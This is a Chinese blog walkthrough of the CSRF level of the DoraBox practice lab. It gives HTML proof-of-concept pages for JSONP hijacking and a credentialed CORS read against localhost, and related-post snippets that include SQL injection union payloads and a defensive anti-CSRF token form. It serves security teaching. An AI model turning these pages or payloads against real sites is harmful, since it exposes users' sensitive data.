DoraBox靶场(二)CSRF

最新推荐文章于 2024-06-06 17:41:52 发布
最新推荐文章于 2024-06-06 17:41:52 发布
阅读量749 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: DoraBox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lorezon/article/details/104919986
本文探讨了DoraBox靶场中的两种安全问题:JSONP劫持和CORS跨域资源读取。在JSONP劫持中,攻击者利用JSON数据的构造函数执行恶意代码,获取敏感数据。作者提供了POC展示如何截获信息。而CORS跨域资源共享允许特定来源访问网站资源,但也可能导致安全风险。通过构建获取信息的页面,展示了如何利用CORS获取敏感信息。对于更深入的CORS讨论,推荐查阅Freebuf的相关文章。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

JSONP劫持

JSONP(JSON With Padding ),是一种特殊的XSRF攻击,目的是获取敏感数据,当JSON数据响应给网站时,浏览器立即会调用数组或者对象的构造函数。正是利用这一点,把构造方法替换成恶意代码,在构造方法中添加将JSON数据发送给第三方即攻击者的代码。

打开页面得到json格式

在这里插入图片描述
这时需要构造劫持页面,用来截获敏感数据。

给出作者的POC

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>json劫持</title>
</head>
<body>
    <script>
    function vulkey(data)
    {
        alert(JSON.stringify(data));
        }
        </script>
<script src="http://localhost/DoraBox-master/csrf/jsonp.php?callback=vulkey">
</script>
</body>
</html>

通过这个页面截获所有信息。

在这里插入图片描述

CORS跨域资源读

CORS(跨域资源共享——Cross-origin resource sharing)是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。

——节选自Freebuf

同样构造获取信息页面,给出POC

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="demo">
<button type="button" οnclick="cors()"CORS</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "http://localhost/DoraBox-master/csrf/userinfo.php", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</body>
</html>

点击页面中的按钮,就可以获取敏感信息。

在这里插入图片描述

关于CORS详细的探讨可以去Freebuf这个链接:

https://www.freebuf.com/column/194652.html

DoraBoxCSRF
justoneu的博客
06-24 564
JSONP劫持 JSONP全称JSON with Padding,是基于JSON格式的为解决跨域请求资源而产生的解决方案。其基本原理是利用了HTML里<script>标签,远程调用JSON文件来实现数据传递。 当某网站通过JSONP的方式来跨域传递用户认证后的敏感信息时,攻击者可以构造恶意的JSONP调用页面,诱导被攻击者访问来达到截取用户敏感信息的目的。 漏洞修复:对refer进行限制;打乱响应主体内容;使用token。 CORS跨域资源读取 跨域...
哆啦盒(DoraBox靶场通过教程
玄道的网安博客
04-27 4449
Sql注入 直接开始第一关,sql注入数字型 源码中id是htmlspecialchars过滤的,过滤是过滤单引号,双引号,尖括号和&的,但是过滤的是html实体并不会影响我们的操作 -1 union select 1,2,3 爆数据库:-1 union select 1,user(),database() 爆表:-1 UNION SELECT 1,2,group...
DoraBox实战】————3、CSRF分析与研究
Fly_鹏程万里
08-07 793
CSRF简介 CSRF的全名为Cross-site request forgery,它的中文名为跨站请求伪造。 CSRF是一种挟持用户在已经登陆的web应用程序上执行非本意的操作的攻击方式。相比于XSS,CSRF是利用了系统对页面浏览器的信任,XSS则利用了系统对用户的信任。 你也可以这样来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了...
DoraBox-CSRF SSRF
baynk的博客
11-25 1090
0x00 基础知识 之前做DVWA时用的都是写入型的CSRF,这次又学习到了新的东西,可以的,开心。 先了解什么是JSONP,看了几篇文章,看完了才动手做的。 说说JSON和JSONP,也许你会豁然开朗,含jQuery用例 详解JSON和JSONP劫持以及解决方法 JSONP 安全攻防技术(JSON劫持、 XSS漏洞) 浏览器的同源策略及跨域解决方案 0x01 CSRF JSONP劫持 现在...
配合小皮系统搭建Droabox靶场
weixin_73970836的博客
08-14 483
四,打开刚刚放进小皮系统WWW目录下的哆啦盒,找到conn.php,以记事本形式打开,修改成小皮系统的账户名和密码,和数据库,保存。五,浏览器打开http://127.0.0.1/DoraBox-master/即可。,启动小皮数据库,创建一个数据库,设置密码及用户。一,将下载好的哆啦盒放进小皮系统的WWW目录下。三,导入在哆啦盒文件下的pentest.sql。无需使用命令行,即可搭建!
DoraBox之SSRF及XXE
justoneu的博客
06-24 738
XXE漏洞 全称XML External Entity Injection, 即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 小白感觉这个东西说白了就是文件包含吧,以允许外部实体载入为前提,引入包含恶意构造的内容的文件而造成攻击效果的漏洞吧。 攻击点应该就是可以上传xml代码的地方,并且没有对xml代码进行检测和过滤 SSRF简介 SSRF(Ser
DoraBox-master.zip
03-17
DoraBox靶场:新手入门Web安全与漏洞分析实践》 DoraBox-master.zip是一个专为初学者设计的靶场资源,旨在帮助用户熟悉和掌握Web安全领域中的基础概念和漏洞利用技术。靶场是一种模拟真实环境的安全训练平台,...
DoraBox-master综合性靶机练习
滕财然的博客
05-18 2153
文章目录1、SQL注入sql数字型:sql字符型:sql搜索型:2、XSS跨站脚本攻击XSS反射型:XSS存储型:XSS DOM型:3、CSRFJSONP劫持:CORS跨域资源读取:4、文件包含任意文件包含:目录限制文件包含:5、文件上传任意文件上传:JS限制文件上传MIME限制文件上传扩展名限制文件上传内容限制文件上传6、命令执行任意代码执行:任意命令执行:7、SSRF8、其它条件竞争-支付条件竞争-上传任意文件读取XXE 1、SQL注入 攻击者可以提交一段精心构造的数据库查询代码,根据返回的结果,获得
[Web安全] xss&CSRF漏洞初探
qq_42551635的博客
09-06 939
[Web安全] xss&CSRF漏洞初探 正文|xss简介 现代网站往往会包含大量的动态内容,动态内容是指web应用程序根据用户环境和需要来输出相关内容。跨站脚本攻击(cross site scripting)是一种针对网站应用程序的安全漏洞利用技术,是代码注入漏洞的一种,它使得攻击者可以通过巧妙地方法向网页中注入恶意代码,用户浏览器在加载网页、渲染html文档时就会执行攻击者的恶意代码,攻击成功后,攻击者可能得到很高的权限,获取私密网页内容、会话、cookie等敏感信息。XSS可以理解为在用户
浅谈JSONP跨域漏洞
weixin_39664643的博客
10-11 3208
浅谈JSONP跨域漏洞 CSRF(Cross site request forgery)跨站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP跨域资源读取 CORS跨域资源读取 当持有敏感资源数据的服务器没
DoraBox实战】————8、SSRF分析与研究
Fly_鹏程万里
08-09 557
SSRF简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF形成原因 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对...
哆啦靶场 SSRF、XXE、XSS、XSS学习、SQL部分通关教程
玄道的网安博客
04-26 3664
SSRF漏洞靶场 来到SSRF首页 看看file_get_content.php 这应该就是file_get_content要包含的文件了 假设我们本地搭建一个1.php文件 然后包含这个文件即可 为什么不是php形式的样子,而是html的形式,因为htmlentities函数把包含进来的转换成html实体了 第关 输入端口445,账号秘密都是r...
DoraBox
qq_45835337的博客
03-01 242
1 数字型 判断列数,为3列 判断回显个数 判断库名 查列名 查数据 2 字符型 判断回显 查库 查表 查列 查数据 3搜索型 观察特点,在前方用%’,后方用# 最后得数据 ...
DoraBox 练习
yqdid的博客
03-01 615
SQL 注入 数字型 1 查找注入点。因为是数值型,所以就直接用数值型注入办法。 2.-1 order by 3 # 查看列数。 3. 爆数据库名为pentest:-1 union select 1,2,database() # 4. 看数据库你让有哪些表名:-1 union select 1,2,group_concat(table_name) from information_schema...
CSRF学习笔记
星落
11-25 661
Crose-Site Request Forgery,跨站请求伪造,攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。
【愚公系列】2023年05月 Web渗透测试之CSRF攻击
热门推荐
时光隧道
08-24 5万+
CSRF(Cross-Site Request Forgery)攻击也称为“跨站请求伪造”,是一种利用用户登录状态在用户不知情的情况下完成非法操作的攻击方式。攻击者可以通过构造一些特定的URL或者使用特定的代码,在用户进行正常操作时,将请求发送到被攻击的网站,在用户没有察觉的情况下完成攻击。GET型CSRF攻击:攻击者在URL中注入参数,用户在点击链接或者图片时访问了带有恶意参数的网站,并在用户不知情的情况下完成攻击。
dorabox靶场writeup
weixin_45705209的博客
08-22 1416
靶场搭建 这里我直接采用Windows下的wamp集成环境,直接将靶场源码下载到本地,解压到网站根目录即可。 网站源码下载地址:https://github.com/Acmesec/DoraBox 数据库的配置,修改conn.php的数据库连接账号及密码,在本地数据库创建一个pentest数据库,将pentest.sql文件导入到数据库中,在创建的库中执行source D:/wamp/www/DoraBox-master/pentest.sql即可,到这里靶场就搭建完毕。 作者也在github上有制作了do
哆啦靶场学习笔记
5L2g556F5ZWl77yf
10-21 1332
文章目录sql注入数字型字符型搜索型XSS跨站反射 XSS 示例CSRFJSONP劫持 https://github.com/gh0stkey/DoraBox sql注入 数字型 注入流程 判断数字型注入 判断字段长度 联合注入 判断数字型注入 判断字段长度 在order by 4 的时候报错,而3不会,证明此表只有3个字段 ?id=1 and 1 = 2 order by 4 --+ 利用 union 定位数据库回显位置 ?id=1 and 1 = 2 union select 1,2,3
【漏洞挖掘】——38、DoraBox中CORS靶场
Fly_鹏程万里
06-06 255
根据需要配置Access-Control-Allow,例如配置信任域而不是使用*来运行所有的域访问。
皮卡丘靶场通关csrf
最新发布
12-30
### 关于皮卡丘靶场中的CSRF漏洞攻防实验解决方案 #### 定义与理解 跨站请求伪造(CSRF),也被称为one-click attack或者session riding,通常缩写为XSXF, 是一种挟制用户在已认证的Web应用程序上执行非本意的操作的攻击方法。CSRF可以使攻击者借助受害者已经经过身份验证的状态,在目标网站上执行某些操作而无需用户的同意。 #### CSRF漏洞成因分析 当一个网站未能正确保护其表单提交过程免遭未经授权的访问时,就可能出现CSRF漏洞[^1]。具体来说: - **缺乏防护机制**:如果`xxx购物网站`不对个人信息修改这样的敏感操作实施有效的防CSRF措施,那么这些请求很容易被第三方模仿并发起恶意行为。 - **依赖会话状态**:一旦用户处于登录状态,并且点击了由攻击者精心设计好的链接之后,由于浏览器自动附带当前站点的有效cookie信息,这使得服务器误以为这是来自合法用户的正常请求从而予以响应。 #### 防御策略实现 为了防止此类攻击的发生,开发者应当采取一系列预防性的编码实践和技术手段来增强应用的安全性: - **引入Token校验**: 对每一个可能影响数据变更的动作都附加独一无的一次性令牌(token), 并要求客户端随同每次POST请求一同传递此token给服务端进行匹配检验。只有当两者一致时才允许继续处理业务逻辑;反之则拒绝此次调用。 - **设置Referer/Origin Header检查**: 通过对比HTTP头部携带的实际来源地址(referer 或 origin header) 和预期的目标域名是否相符来进行初步筛选过滤掉那些明显不符合规则的数据包。 - **采用SameSite Cookie属性配置**: 设置Cookie 的 SameSite 属性可以帮助阻止大多数类型的CSRF 攻击。它指示浏览器仅在同一站点上下文中发送特定 cookie (即原始页面和目标资源属于同一个顶级域) , 进一步减少了非法源站利用存储的身份凭证发动攻击的可能性。 ```html <!-- HTML Form with Anti-CSRF Token --> <form action="/change-email" method="post"> <!-- Hidden input field containing the anti-forgery token --> <input type="hidden" name="_csrf_token" value="{{ csrf_token }}"> Email Address:<br> <input type="text" name="email"><br><br> <button type="submit">Submit</button> </form> ``` 上述代码展示了如何在一个HTML表单中嵌入隐藏字段用于传输anti-csrf-token,确保每一次更改邮箱的行为都是可信可靠的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值